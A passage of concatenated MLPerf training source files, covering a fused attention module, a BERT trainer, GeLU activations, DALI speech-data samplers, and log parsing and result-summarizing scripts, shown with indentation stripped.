tf.compat.v1.app.run()
```
#### File: implementations/implementation_closed/fmha.py
```python
import torch
import torch.nn.functional as F
from apex.contrib.fmha import FMHAFun
from collections import OrderedDict
import numpy as np
class TestParam(torch.nn.Parameter):
def __init__(self, data, requires_grad=True):
super(TestParam, self).__init__()
self.data = data
self.requires_grad = requires_grad
self.tag = 'qkv'
self.counter = 0
class NoopCat(torch.autograd.Function):
@staticmethod
def forward(ctx, Wq, Wk, Wv, Bq, Bk, Bv, Wqkv, Bqkv, hidden_size):
assert not Wqkv.requires_grad and not Bqkv.requires_grad, "hye!"
Wtmp = Wqkv.view(3, hidden_size, hidden_size)
Btmp = Bqkv.view(3, hidden_size)
Wq.data = Wtmp[0,:,:]
Wk.data = Wtmp[1,:,:]
Wv.data = Wtmp[2,:,:]
Bq.data = Btmp[0,:]
Bk.data = Btmp[1,:]
Bv.data = Btmp[2,:]
Wtmp = Wqkv.new()
Wtmp.set_(Wqkv.storage(), Wqkv.storage_offset(), Wqkv.size(), Wqkv.stride())
Wtmp.requires_grad = True
Btmp = Bqkv.new()
Btmp.set_(Bqkv.storage(), Bqkv.storage_offset(), Bqkv.size(), Bqkv.stride())
Btmp.requires_grad = True
ctx.save_for_backward(Wqkv, Bqkv, Wq, Wk, Wv, Bq, Bk, Bv)
ctx.hidden_size = hidden_size
return Wtmp, Btmp
@staticmethod
def backward(ctx, dWqkv, dBqkv):
Wqkv, Bqkv, Wq, Wk, Wv, Bq, Bk, Bv = ctx.saved_tensors
Wtmp = Wqkv.view(3, ctx.hidden_size, ctx.hidden_size)
Btmp = Bqkv.view(3, ctx.hidden_size)
Wq.data = Wtmp[0,:,:]
Wk.data = Wtmp[1,:,:]
Wv.data = Wtmp[2,:,:]
Bq.data = Btmp[0,:]
Bk.data = Btmp[1,:]
Bv.data = Btmp[2,:]
dWtmp = dWqkv.view(3, ctx.hidden_size, ctx.hidden_size)
dBtmp = dBqkv.view(3, ctx.hidden_size)
return dWtmp[0, :,:], dWtmp[1, :,:], dWtmp[2, :,:], dBtmp[0,:], dBtmp[1,:], dBtmp[2,:], None, None, None
class FMHA(torch.nn.Module):
def __init__(self, config):
super(FMHA, self).__init__()
self.p_dropout = config.attention_probs_dropout_prob
self.h = config.num_attention_heads
self.hidden_size = config.hidden_size
self.d = self.hidden_size // self.h
assert self.d * self.h == self.hidden_size, "Invalid hidden size/num_heads"
self.register_buffer("Wqkv",torch.zeros(3 * config.hidden_size, config.hidden_size))
self.register_buffer("Bqkv",torch.zeros(3 * config.hidden_size))
self.Wqkv.requires_grad = False
self.Bqkv.requires_grad = False
self.Wqkv.detach()
self.Bqkv.detach()
with torch.no_grad():
params = []
Wtmp = self.Wqkv.view(3, self.hidden_size, self.hidden_size)
Btmp = self.Bqkv.view(3, self.hidden_size)
for tag, idx in zip('qkv', range(3)):
params.append(('W' + tag, torch.nn.Parameter(Wtmp[idx,:,:])))
params.append(('B' + tag, torch.nn.Parameter(Btmp[idx,:])))
self.param_views = OrderedDict(params)
self._reset_param_views()
def prep_weights(state_dict, prefix, local_metadata, strict, missing_keys, unexpected_keys, error_msgs):
Wq = state_dict.pop(prefix + 'query.weight')
bq = state_dict.pop(prefix + 'query.bias')
Wk = state_dict.pop(prefix + 'key.weight')
bk = state_dict.pop(prefix + 'key.bias')
Wv = state_dict.pop(prefix + 'value.weight')
bv = state_dict.pop(prefix + 'value.bias')
weight = torch.cat([Wq.view(self.h, self.d, self.hidden_size),
Wk.view(self.h, self.d, self.hidden_size),
Wv.view(self.h, self.d, self.hidden_size)],
dim=0).reshape(config.hidden_size*3,config.hidden_size).contiguous()
bias = torch.cat([bq.view(self.h, self.d),
bk.view(self.h, self.d),
bv.view(self.h, self.d)],
dim=0).reshape(3*config.hidden_size).contiguous()
state_dict[prefix + 'Wqkv'] = weight
state_dict[prefix + 'Bqkv'] = bias
state_dict[prefix + 'Wq'] = Wq
state_dict[prefix + 'Wk'] = Wk
state_dict[prefix + 'Wv'] = Wv
state_dict[prefix + 'Bq'] = bq
state_dict[prefix + 'Bk'] = bk
state_dict[prefix + 'Bv'] = bv
self._register_load_state_dict_pre_hook(prep_weights)
def _reset_param_views(self):
with torch.no_grad():
Wtmp = self.Wqkv.view(3, self.hidden_size, self.hidden_size)
Btmp = self.Bqkv.view(3, self.hidden_size)
for tag, idx in zip('qkv', range(3)):
self.param_views['W' + tag].data = Wtmp[idx, :, :]
self.param_views['B' + tag].data = Btmp[idx, :]
def _apply(self, fn):
with torch.no_grad():
self.Wqkv = fn(self.Wqkv)
if self.Wqkv.grad is not None:
self.Wqkv.grad = fn(self.Wqkv.grad)
self.Bqkv = fn(self.Bqkv)
if self.Bqkv.grad is not None:
self.Bqkv.grad = fn(self.Bqkv.grad)
self._reset_param_views()
@property
def _parameters(self):
self._reset_param_views()
return self.param_views
@_parameters.setter
def _parameters(self, _):
if 'Wqkv' in self.__dict__ and self.Wqkv is not None and self.Wqkv.device == torch.device('cuda:0'):
import traceback
traceback.print_stack()
pass
def forward(self, hidden_states, cu_seqlens, seqlens, max_s, is_training=True):
Wqkv, Bqkv = NoopCat.apply(*[self.param_views[x + y] for x in 'WB' for y in 'qkv'], self.Wqkv, self.Bqkv, self.hidden_size)
qkv = F.linear(hidden_states, Wqkv, Bqkv)
p_dropout = self.p_dropout
ctx = FMHAFun.apply(qkv.view(-1, 3, self.h, self.d), cu_seqlens, seqlens, p_dropout, max_s, is_training)
return ctx.view(-1, self.hidden_size)
```
#### File: implementations/implementation_closed/fwd_loss_bwd_trainer.py
```python
import torch
from function import graph
from apex import amp
class FwdLossBwdTrainer():
def __init__(self, args, grad_scaler):
super(FwdLossBwdTrainer, self).__init__()
self.args = args
self.grad_scaler = grad_scaler
self.capture_stream = torch.cuda.Stream()
self.send_stats_in_parallel = False
self.stats_stream = torch.cuda.Stream()
self.loss_cpu = torch.tensor(0.0, dtype=torch.float32, device='cpu').pin_memory()
self.mlm_acc_cpu = torch.tensor(0.0, dtype=torch.float32, device='cpu').pin_memory()
def capture_bert_model_segment_graph(self, bert_model, use_cuda_graph):
# eval batch depends on the rank, since eval sample count isn't divisible by world size
rank = torch.distributed.get_rank()
world_size = torch.distributed.get_world_size()
eval_batch_min = self.args.num_eval_examples // world_size
remainder = self.args.num_eval_examples % world_size
if rank<remainder:
eval_batch = eval_batch_min + 1
else:
eval_batch = eval_batch_min
eval_batch = min(eval_batch, self.args.eval_batch_size)
batches_to_graph = [eval_batch, self.args.train_batch_size]
bert_model_segment = bert_model.bert_model_segment
sample_model_train = [
torch.ones(self.args.train_batch_size, self.args.max_seq_length, dtype=torch.int64, device=self.args.device),
torch.ones(self.args.train_batch_size, self.args.max_seq_length, dtype=torch.int64, device=self.args.device),
torch.ones(self.args.train_batch_size, self.args.max_seq_length, dtype=torch.int64, device=self.args.device),
]
sample_model_eval = [
torch.ones(eval_batch, self.args.max_seq_length, dtype=torch.int64, device=self.args.device),
torch.ones(eval_batch, self.args.max_seq_length, dtype=torch.int64, device=self.args.device),
torch.ones(eval_batch, self.args.max_seq_length, dtype=torch.int64, device=self.args.device),
]
bert_model_segment = graph(bert_model_segment,
tuple(t.clone() for t in sample_model_train),
tuple(t.clone() for t in sample_model_eval) if self.args.eval_batch_size * world_size >= self.args.num_eval_examples else None,
self.capture_stream,
warmup_iters=8,
warmup_only=(not use_cuda_graph))
bert_head_segment = bert_model.heads_only_segment
sample_head_train = [
torch.ones(self.args.train_batch_size, self.args.max_seq_length, 1024, dtype=torch.float16, device=self.args.device),
torch.ones(self.args.train_batch_size, 1024, dtype=torch.float16, device=self.args.device),
torch.ones(self.args.train_batch_size, self.args.max_seq_length, dtype=torch.int64, device=self.args.device),
torch.ones(self.args.train_batch_size, dtype=torch.int64, device=self.args.device),
]
sample_head_eval = [
torch.ones(eval_batch, self.args.max_seq_length, 1024, dtype=torch.float16, device=self.args.device),
torch.ones(eval_batch, 1024, dtype=torch.float16, device=self.args.device),
torch.ones(eval_batch, self.args.max_seq_length, dtype=torch.int64, device=self.args.device),
torch.ones(eval_batch, dtype=torch.int64, device=self.args.device),
]
sample_head_tuple_train = tuple([sample_head_train[0].clone().requires_grad_(), sample_head_train[1].clone().requires_grad_(), sample_head_train[2].clone(), sample_head_train[3].clone()])
sample_head_tuple_eval = tuple([sample_head_eval[0].clone(), sample_head_eval[1].clone(), sample_head_eval[2].clone(), sample_head_eval[3].clone()])
bert_head_segment = graph(bert_head_segment,
sample_head_tuple_train,
sample_head_tuple_eval if self.args.eval_batch_size * world_size >= self.args.num_eval_examples else None,
self.capture_stream,
warmup_iters=8,
warmup_only=(not use_cuda_graph))
return bert_model
def eval_step(self, batch, model):
model.eval()
input_ids, segment_ids, input_mask, masked_lm_labels, next_sentence_labels = batch
loss = None
mlm_acc = None
loss, mlm_acc, num_valid = model(input_ids, segment_ids, input_mask,
masked_lm_labels, next_sentence_labels)
return loss, mlm_acc, num_valid
def step(self, step, batch, model, optimizer):
input_ids, segment_ids, input_mask, masked_lm_labels, next_sentence_labels = batch
loss = None
mlm_acc = None
loss, mlm_acc, _ = model(input_ids, segment_ids, input_mask,
masked_lm_labels, next_sentence_labels)
if self.send_stats_in_parallel:
self.stats_stream.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(self.stats_stream):
self.loss_cpu.copy_(loss.detach(), non_blocking=True)
self.mlm_acc_cpu.copy_(mlm_acc.detach(), non_blocking=True)
if self.args.bypass_amp:
loss.backward()
elif self.args.distributed_lamb:
optimizer._lazy_init_stage1()
self.grad_scaler.scale(loss).backward()
optimizer._lazy_init_stage2()
else:
with amp.scale_loss(loss, optimizer, delay_overflow_check=self.args.allreduce_post_accumulation) as scaled_loss:
scaled_loss.backward()
if self.send_stats_in_parallel:
self.stats_stream.synchronize()
loss = self.loss_cpu
mlm_acc = self.mlm_acc_cpu
return loss, mlm_acc
```
#### File: model/layers/activations.py
```python
import math
import torch
from torch import nn
# Fused GeLU
torch._C._jit_set_profiling_mode(False)
torch._C._jit_set_profiling_executor(False)
torch._C._jit_override_can_fuse_on_cpu(True)
torch._C._jit_override_can_fuse_on_gpu(True)
# 1/sqrt(2*pi)-> 0.3989423
# 1/sqrt(2) -> 0.70710678
# sqrt(2/pi) -> 0.79788456
# this function is tanh approximation of gelu
# actual gelu is:
# x * 0.5 * (1.0 + torch.erf(x * 0.70710678))
@torch.jit.script
def bias_gelu(bias, y):
x = bias + y
return x * 0.5 * (1.0 + torch.tanh(0.79788456 * x * (1 + 0.044715 * x * x)))
# gradient of tanh approximation of gelu
# gradient of actual gelu is:
# 0.5 * (1. + torch.erf(x * 0.70710678)) + 0.3989423 * x * torch.exp(-0.5 * x * x)
@torch.jit.script
def bias_gelu_back(g, bias, y):
x = bias + y
tanh_out = torch.tanh(0.79788456 * x * (1 + 0.044715 * x * x))
# sqrt(2/pi) * 3 * 0.044715 -> 0.1070322243
ff = 0.5 * x * ((1 - tanh_out * tanh_out) * (0.79788456 + 0.1070322243 * x * x)) + 0.5 * (1 + tanh_out)
return ff*g
class GeLUFunction(torch.autograd.Function):
@staticmethod
# bias is an optional argument
def forward(ctx, input, bias):
ctx.save_for_backward(input, bias)
return bias_gelu(bias, input)
@staticmethod
def backward(ctx, grad_output):
input, bias = ctx.saved_tensors
tmp = bias_gelu_back(grad_output, bias, input)
return tmp, tmp
bias_gelu_impl = GeLUFunction.apply
# Swish
def swish(x):
return x * torch.sigmoid(x)
# Fast GeLU
def fast_gelu(x):
pi = 3.1415926535897932
cdf = 0.5 * (1.0 + torch.tanh((math.sqrt(2 / pi) * (x + 0.044715 * torch.pow(x, 3)))))
return x * cdf
ACT2FN = {
"gelu": fast_gelu,
"bias_gelu": bias_gelu_impl,
"relu": torch.nn.functional.relu,
"swish": swish
}
```
#### File: data/dali/sampler.py
```python
import os
import numpy as np
import torch
from common.helpers import print_once
def hash_list_of_strings(li):
return str(abs(hash(''.join(li))))
def _parse_json(json_path: str, start_label=0, predicate=lambda json: True, tokenized_transcript=False):
"""
Parses json file to the format required by DALI
Args:
json_path: path to json file
start_label: the label, starting from which DALI will assign consecutive int numbers to every transcript
predicate: function, that accepts a sample descriptor (i.e. json dictionary) as an argument.
If the predicate for a given sample returns True, it will be included in the dataset.
Returns:
output_files: dictionary, that maps file name to label assigned by DALI
transcripts: dictionary, that maps label assigned by DALI to the transcript
"""
import json
global cnt
with open(json_path) as f:
librispeech_json = json.load(f)
output_files = {}
transcripts = {}
curr_label = start_label
for original_sample in librispeech_json:
if not predicate(original_sample):
continue
transcripts[curr_label] = original_sample['tokenized_transcript' if tokenized_transcript else 'transcript']
output_files[original_sample['files'][-1]['fname']] = dict(
label=curr_label,
duration=original_sample['original_duration'],
)
curr_label += 1
return output_files, transcripts
def _parse_pkl(pkl_path: str, start_label=0, predicate=lambda pkl: True, tokenized_transcript=True):
if not tokenized_transcript:
raise NotImplementedError("pickle input only works with tokenized_transcript")
import pickle
with open(pkl_path, 'rb') as f:
librispeech_pkl = pickle.load(f)
output_files = {}
transcripts = {}
curr_label = start_label
for original_sample in librispeech_pkl:
if not predicate(original_sample):
continue
transcripts[curr_label] = original_sample['tokenized_transcript']
output_files[original_sample['fname']] = dict(
label=curr_label,
duration=original_sample['original_duration'],
)
curr_label += 1
return output_files, transcripts
class SimpleSampler:
def __init__(self, config_data, dist_sampler=False):
self.file_list_path = None
self.files, self.labels = [], []
self.dataset_size = None
self.dist_sampler = dist_sampler
self.rank = torch.distributed.get_rank() if torch.distributed.is_initialized() else 0
self.config_data = config_data
def write_file_list(self, names, labels):
with open(self.file_list_path, 'w') as f:
f.writelines(f'{name} {label}\n' for name, label in zip(names, labels))
def get_file_list_path(self):
assert self.file_list_path, 'File list not initialized. Run make_file_list first'
return self.file_list_path
def get_dataset_size(self):
assert self.dataset_size, 'Dataset size not known. Run make_file_list first'
return self.dataset_size
def is_sampler_random(self):
return False
def process_output_files(self, output_files):
print_once('Launching simple sampler')
self.dataset_size = len(output_files)
self.max_duration = max(entry['duration'] for _, entry in output_files.items())
return [path for path, _ in output_files.items()], \
[entry['label'] for _, entry in output_files.items()]
def make_file_list(self, output_files, json_names):
file_name = hash_list_of_strings(json_names)
if self.dist_sampler:
file_name += '__%d' % self.rank
self.file_list_path = os.path.join(
"/tmp",
"rnnt_dali.file_list." + file_name
)
self.write_file_list(*self.process_output_files(output_files))
def make_files(self, output_files):
self.files, self.labels = self.process_output_files(output_files)
def sample(self, file_names, in_mem_file_list, tokenized_transcript):
output_files, self.transcripts = {}, {}
max_duration = self.config_data['max_duration']
for file in file_names:
if file.endswith('.json'):
parse_func = _parse_json
elif file.endswith('.pkl'):
parse_func = _parse_pkl
else:
raise NotImplementedError("Please supply supported input data file type: json or pickle")
of, tr = parse_func(
file if file[0] == '/' else os.path.join(dataset_path, file),
len(output_files),
predicate=lambda file: file['original_duration'] <= max_duration,
tokenized_transcript=tokenized_transcript,
)
output_files.update(of)
self.transcripts.update(tr)
if in_mem_file_list:
self.make_files(output_files)
else:
self.make_file_list(output_files, file_names)
class BucketingSampler(SimpleSampler):
def __init__(self, config_data, num_buckets, batch_size, num_workers, num_epochs, seed, dist_sampler, pre_sort):
super(BucketingSampler, self).__init__(config_data, dist_sampler)
assert not pre_sort, "pre_sort not supported in BucketingSampler"
self.rng = np.random.default_rng(seed=seed)
self.num_buckets = num_buckets
self.num_epochs = num_epochs
self.batch_size = batch_size
self.num_workers = num_workers
def process_output_files(self, output_files):
print_once('Launching bucketing sampler')
names = list(output_files)
lengths = [output_files[name]['duration'] for name in names]
labels = np.array([output_files[name]['label'] for name in names])
len_ids = np.argsort(lengths)
buckets = np.array_split(len_ids, self.num_buckets)
gbs = self.batch_size * self.num_workers
shuffled_buckets = np.array([
perm
for _ in range(self.num_epochs) # for every epoch
for bucket in buckets # from every bucket
for perm in self.rng.permutation(bucket) # pick samples in random order
])
# drop last batch
epochs = np.reshape(shuffled_buckets, [self.num_epochs, -1])
to_drop = epochs.shape[1] - (epochs.shape[1] // gbs * gbs)
for epoch in epochs:
dropped_idxs = self.rng.choice(epochs.shape[1], to_drop, replace=False)
if to_drop > 0:
epoch[dropped_idxs] = -1
epochs = epochs[epochs != -1].reshape(self.num_epochs, -1)
self.dataset_size = epochs.shape[1]
epochs_iters_batch = np.reshape(epochs, [self.num_epochs, -1, gbs])
# shuffle iterations in epochs perserving batches
for epoch in epochs_iters_batch:
self.rng.shuffle(epoch, axis=0)
epochs_iters_batch_worker = np.reshape(
epochs_iters_batch,
[self.num_epochs, -1, self.batch_size, self.num_workers]
)
workers_epochs_iters_batch = np.moveaxis(epochs_iters_batch_worker, -1, 0)
if self.dist_sampler:
order = workers_epochs_iters_batch[self.rank].flatten()
else:
order = workers_epochs_iters_batch.flatten()
return np.array(names) [order].tolist(), \
np.array(labels)[order].tolist()
def is_sampler_random(self):
return True
class VectorizedBucketingSampler(SimpleSampler):
def __init__(self, config_data, num_buckets, batch_size, num_workers, num_epochs, seed, dist_sampler, pre_sort):
super(VectorizedBucketingSampler, self).__init__(config_data, dist_sampler)
self.seed = seed
self.num_buckets = num_buckets
self.num_epochs = num_epochs
self.batch_size = batch_size
self.num_workers = num_workers
self.pre_sort = pre_sort
def process_output_files(self, output_files):
print_once('Launching vectorized bucketing sampler')
names = list(output_files)
lengths = [output_files[name]['duration'] for name in names]
labels = np.array([output_files[name]['label'] for name in names])
dur = torch.tensor(lengths, device='cuda')
len_ids = dur.argsort()
buckets = len_ids.tensor_split(self.num_buckets)
padded_buckets = torch.nn.utils.rnn.pad_sequence(buckets, padding_value=-1, batch_first=True)
with torch.random.fork_rng(devices=range(torch.cuda.device_count())):
torch.random.manual_seed(self.seed)
self.seed += 1
buckets_shuffler = torch.rand(self.num_epochs, *padded_buckets.shape, device='cuda')
shuffle_columnvise = buckets_shuffler.argsort(dim=2)
epochs, num_buckets, samples = shuffle_columnvise.shape
shift = torch.arange(0, samples*num_buckets, samples, device='cuda').view(1, -1, 1)
shuffle_globalvise = shuffle_columnvise + shift
shuffled_buckets = padded_buckets.take(shuffle_globalvise)
gbs = self.batch_size * self.num_workers
unpadded = shuffled_buckets[shuffled_buckets != -1].view(epochs, -1)
epochs, samples = unpadded.shape
to_drop = samples - (samples // gbs * gbs)
mask = torch.ones_like(unpadded, dtype=bool, device='cuda')
removed_samples = torch.rand(unpadded.shape, device='cuda').argsort(dim=1)[:, :to_drop]
epoch_idx = torch.arange(self.num_epochs).view(-1, 1).expand(self.num_epochs, to_drop)
mask[epoch_idx.flatten(), removed_samples.flatten()] = False
batch_aligned = unpadded[mask].view(self.num_epochs, -1, self.batch_size)
_, num_iterations, _ = batch_aligned.shape
epochs, num_batches, bs = batch_aligned.view(self.num_epochs, -1, gbs).shape
new_order = torch.rand(epochs, num_batches, device='cuda')
nwo = new_order.argsort(dim=1).view(-1, num_batches, 1) * bs \
+ torch.arange(0, bs, 1, device='cuda').view(1,1,-1) \
+ torch.arange(0, epochs*num_batches*bs, num_batches*bs,device='cuda').view(-1, 1, 1)
out = batch_aligned.take(nwo)
if self.pre_sort:
# At this point, the mini-batch has been formed. Now we can arrange work to each GPU
pert_range = self.config_data['speed_perturbation']['max_rate'] - self.config_data['speed_perturbation']['min_rate']
self.pert_coeff = torch.rand(out.size(0), out.size(1), out.size(2), device="cuda") * pert_range + self.config_data['speed_perturbation']['min_rate']
dur_after_pert = dur[out] * self.pert_coeff
idx_asc = dur_after_pert.argsort(dim=-1)
idx_des = torch.flip(idx_asc, dims=[-1])
idx_mix = torch.ones_like(idx_asc)
# Assuming batch size is a multiple of 2.
idx_mix[:, :, ::2] = idx_asc[:, :, :idx_asc.size(-1) // 2]
idx_mix[:, :, 1::2] = idx_des[:, :, :idx_des.size(-1) // 2]
out = torch.gather(out, 2, idx_mix)
self.pert_coeff = torch.gather(self.pert_coeff, 2, idx_mix)
# to test, try
# dur[out] * self.pert_coeff
if self.dist_sampler:
out = out.view(epochs, -1, self.num_workers, self.batch_size).moveaxis(2, 0)
out = out[self.rank]
if self.pre_sort:
self.pert_coeff = self.pert_coeff.view(epochs, -1, self.num_workers, self.batch_size).moveaxis(2, 0)
self.pert_coeff = self.pert_coeff[self.rank].cpu()
self.dataset_size = num_iterations * self.batch_size
out = out.cpu()
return np.array(names) [out.flatten()].tolist(), \
np.array(labels)[out.flatten()].tolist()
def is_sampler_random(self):
return True
```
#### File: compliance_checker/mlp_parser/ruleset_100.py
```python
from __future__ import print_function
import collections
import json
import re
import sys
from io import open
LogLine = collections.namedtuple('LogLine', [
'full_string', # the complete line as a string
'timestamp', # seconds as a float, e.g. 1234.567
'key', # the string key
'value', # the parsed value associated with the tag, or None if no value
'lineno', # the line number in the file
])
TOKEN = ':::MLLOG '
def parse_line(line):
if not line.startswith(TOKEN):
return None
return json.loads(line[len(TOKEN):])
def string_to_logline(lineno, string):
''' Returns a LogLine or raises a ValueError '''
m = parse_line(string)
if m is None:
raise ValueError('does not match regex')
args = []
args.append(string) # full string
ts = float(m['time_ms']) # may raise error, e.g. "1.2.3"
# TODO check for weird values
args.append(ts)
args.append(m['key']) # key
j = { 'value': m['value'], 'metadata': m['metadata'] }
args.append(j)
args.append(lineno)
return LogLine(*args)
def parse_file(filename):
''' Reads a file by name and returns list of loglines and list of errors'''
with open(filename, encoding='latin-1') as f:
return parse_generator(f)
def strip_and_dedup(gen):
lines = []
for l in gen:
if TOKEN not in l:
continue
lines.append(re.sub(".*"+TOKEN, TOKEN, l))
return lines
def parse_generator(gen):
''' Reads a generator of lines and returns (loglines, errors)
The list of errors are any parsing issues as a tuple (str_line, error_msg)
'''
loglines = []
failed = []
for lineno, line in enumerate(strip_and_dedup(gen)):
line = line.strip()
try:
ll = string_to_logline(lineno, line)
loglines.append(ll)
except ValueError as e:
failed.append((line, str(e)))
return loglines, failed
if __name__ == '__main__':
if len(sys.argv) != 2:
print('usage: mlp_parser.py FILENAME')
print(' tests parsing on the file.')
sys.exit(1)
filename = sys.argv[1]
lines, errors = parse_file(filename)
print('Parsed {} log lines with {} errors.'.format(len(lines), len(errors)))
if len(errors) > 0:
print('Lines which failed to parse:')
for line, error in errors:
print(' Following line failed: {}'.format(error))
print(line)
```
#### File: mlperf_logging/result_summarizer/result_summarizer.py
```python
from __future__ import print_function
import argparse
import copy
import glob
import json
import os
import re
import sys
from ..compliance_checker import mlp_compliance
from ..rcp_checker import rcp_checker
_ALLOWED_BENCHMARKS_V06 = [
'resnet',
'ssd',
'maskrcnn',
'gnmt',
'transformer',
'ncf',
'minigo',
]
_ALLOWED_BENCHMARKS_V07 = [
'bert',
'dlrm',
'gnmt',
'maskrcnn',
'minigo',
'resnet',
'ssd',
'transformer',
]
_ALLOWED_BENCHMARKS_V10 = [
'bert',
'dlrm',
'maskrcnn',
'minigo',
'resnet',
'ssd',
'rnnt',
'unet3d',
]
_RUN_START_REGEX = r':::MLLOG (.*"run_start",.*)'
_RUN_STOP_REGEX = r':::MLLOG (.*"run_stop",.*)'
def _get_sub_folders(folder):
sub_folders = [os.path.join(folder, sub_folder)
for sub_folder in os.listdir(folder)]
return [sub_folder
for sub_folder in sub_folders
if os.path.isdir(sub_folder)]
def _read_json_file(json_file):
with open(json_file, 'r') as f:
return json.load(f)
def _pretty_system_name(system_desc):
system_name = system_desc['system_name']
if system_name == 'tpu-v3':
chips = int(system_desc['accelerators_per_node']) * 2
return 'TPUv3.{}'.format(chips)
return system_name
def _linkable_system_name(system_desc):
system_name = system_desc['system_name']
if system_name == 'tpu-v3':
chips = int(system_desc['accelerators_per_node']) * 2
return 'tpu-v3-{}'.format(chips)
return system_name
def _pretty_accelerator_model_name(system_desc):
accelerator_model_name = system_desc['accelerator_model_name']
if accelerator_model_name == 'tpu-v3':
return 'TPUv3'
return accelerator_model_name
def _pretty_framework(system_desc):
framework = system_desc['framework']
if 'TensorFlow' in framework:
commit_hash = re.search(r' commit hash = .*', framework)
if commit_hash:
return framework.replace(commit_hash.group(0), '')
return framework
def _benchmark_alias(benchmark):
if benchmark == 'mask':
return 'maskrcnn'
return benchmark
def _ruleset_url_prefix(ruleset):
short_ruleset = ruleset.replace('.0', '')
return 'https://github.com/mlperf/training_results_v{}'.format(short_ruleset)
def _details_url(system_desc, ruleset):
return '{ruleset_prefix}/blob/master/{submitter}/systems/{system}.json'.format(
ruleset_prefix=_ruleset_url_prefix(ruleset),
submitter=system_desc['submitter'],
system=_linkable_system_name(system_desc))
def _code_url(system_desc, ruleset):
return '{ruleset_prefix}/blob/master/{submitter}/benchmarks'.format(
ruleset_prefix=_ruleset_url_prefix(ruleset),
submitter=system_desc['submitter'])
def _row_key(system_desc):
system_name = '{}-{}-{}'.format(system_desc['division'], system_desc['system_name'], system_desc['framework'])
if system_name == 'tpu-v3':
chips = int(system_desc['accelerators_per_node']) * 2
return 'tpu-v3-{:04d}'.format(chips)
return system_name
def _read_mlperf_score(result_file, ruleset):
with open(result_file, 'r') as f:
result = f.read()
config_file = '{ruleset}/common.yaml'.format(ruleset=ruleset)
checker = mlp_compliance.make_checker(
ruleset=ruleset,
quiet=True,
werror=False)
valid, _, _, _ = mlp_compliance.main(result_file, config_file, checker)
if not valid:
return None
run_start = re.search(_RUN_START_REGEX, result)
if run_start is None:
raise Exception('Failed to match run_start!.')
run_start = json.loads(run_start.group(1))['time_ms']
run_stop = re.search(_RUN_STOP_REGEX, result)
run_stop = json.loads(run_stop.group(1))['time_ms']
seconds = float(run_stop) - float(run_start)
minutes = seconds / 60 / 1000 # convert ms to minutes
return minutes
def _compute_olympic_average(scores, dropped_scores, max_dropped_scores):
"""Olympic average by dropping the top and bottom max_dropped_scores:
If max_dropped_scores == 1, then we compute a normal olympic score.
If max_dropped_scores > 1, then we drop more than one scores from the
top and bottom and average the rest.
When dropped_scores > 0, then some scores have already been dropped
so we should not double count them
Precondition: Dropped scores have higher score value than the rest
"""
# Sort scores first
scores.sort()
# Remove top and bottom scores
countable_scores = scores[max_dropped_scores:len(scores)-(max_dropped_scores-dropped_scores)]
sum_of_scores = sum(countable_scores)
return sum_of_scores * 1.0 / len(countable_scores)
def _is_organization_folder(folder):
if not os.path.isdir(folder):
return False
systems_folder = os.path.join(folder, 'systems')
if not os.path.exists(systems_folder):
return False
results_folder = os.path.join(folder, 'results')
if not os.path.exists(results_folder):
return False
return True
def summarize_results(folder, ruleset):
"""Summarizes a set of results.
Args:
folder: The folder for a submission package.
ruleset: The ruleset such as 0.6.0, 0.7.0, or 1.0.0.
"""
systems_folder = os.path.join(folder, 'systems')
results_folder = os.path.join(folder, 'results')
rows = {}
for system_folder in _get_sub_folders(results_folder):
folder_parts = system_folder.split('/')
system = folder_parts[-1]
# Load corresponding system description.
system_file = os.path.join(
systems_folder, '{}.json'.format(system))
if not os.path.exists(system_file):
print('ERROR: Missing {}'.format(system_file))
continue
try:
desc = _read_json_file(system_file)
except:
print('ERROR: Could not decode JSON struct in {}'.format(system_file))
continue
# Construct prefix portion of the row.
row = ''
if 'division' not in desc:
print('ERROR: "division" field missing in {}'.format(system_file))
continue
row += '"{}",'.format(desc['division'])
if 'submitter' not in desc:
print('ERROR: "submitter" field missing in {}'.format(system_file))
continue
row += '"{}",'.format(desc['submitter'])
if 'system_name' not in desc:
print('ERROR: "system_name" field missing in {}'.format(system_file))
continue
row += '"{}",'.format(_pretty_system_name(desc))
if 'host_processor_model_name' not in desc:
print('ERROR: "host_processor_model_name" field missing in {}'.format(system_file))
continue
row += '"{}",'.format(desc['host_processor_model_name'])
if 'host_processor_core_count' not in desc:
print('ERROR: "host_processor_core_count" field missing in {}'.format(system_file))
continue
row += '{},'.format(int(desc['host_processors_per_node']) * int(desc['number_of_nodes']))
if 'accelerator_model_name' not in desc:
print('ERROR: "accelerator_model_name" field missing in {}'.format(system_file))
continue
row += '"{}",'.format(_pretty_accelerator_model_name(desc))
if 'accelerators_per_node' not in desc:
print('ERROR: "accelerators_per_node" field missing in {}'.format(system_file))
continue
row += '{},'.format(int(desc['accelerators_per_node']) * int(desc['number_of_nodes']))
if 'framework' not in desc:
print('ERROR: "framework" field missing in {}'.format(system_file))
continue
row += '"{}",'.format(_pretty_framework(desc))
# Collect scores for benchmarks.
benchmark_scores = {}
for benchmark_folder in _get_sub_folders(system_folder):
folder_parts = benchmark_folder.split('/')
benchmark = _benchmark_alias(folder_parts[-1])
# Read scores from result files.
pattern = '{folder}/result_*.txt'.format(folder=benchmark_folder)
result_files = glob.glob(pattern, recursive=True)
scores = []
dropped_scores = 0
for result_file in result_files:
score = _read_mlperf_score(result_file, ruleset)
if score is None:
dropped_scores += 1
else:
scores.append(score)
max_dropped_scores = 4 if benchmark == 'unet3d' else 1
if dropped_scores > max_dropped_scores:
print('CRITICAL ERROR: Too many non-converging runs for {} {}/{}'.
format(desc['submitter'], system, benchmark))
print('** CRITICAL ERROR ** Results in the table for {} {}/{} are NOT correct'.
format(desc['submitter'], system, benchmark))
elif dropped_scores >= 1:
print('NOTICE: Dropping non-converged run(s) for {} {}/{} using olympic scoring.'
.format(desc['submitter'], system, benchmark))
if dropped_scores <= max_dropped_scores:
benchmark_scores[benchmark] = _compute_olympic_average(scores, dropped_scores, max_dropped_scores)
# Construct scores portion of the row.
if ruleset == '0.6.0':
allowed_benchmarks = _ALLOWED_BENCHMARKS_V06
elif ruleset == '0.7.0':
allowed_benchmarks = _ALLOWED_BENCHMARKS_V07
elif ruleset == '1.0.0':
allowed_benchmarks = _ALLOWED_BENCHMARKS_V10
for benchmark in allowed_benchmarks:
if benchmark in benchmark_scores:
row += '{:.2f},'.format(benchmark_scores[benchmark])
else:
row += ','
# Construct postfix portion of the row.
row += '{},'.format(_details_url(desc, ruleset))
row += '{},'.format(_code_url(desc, ruleset))
rows[_row_key(desc)] = row
# Print rows in order of the sorted keys.
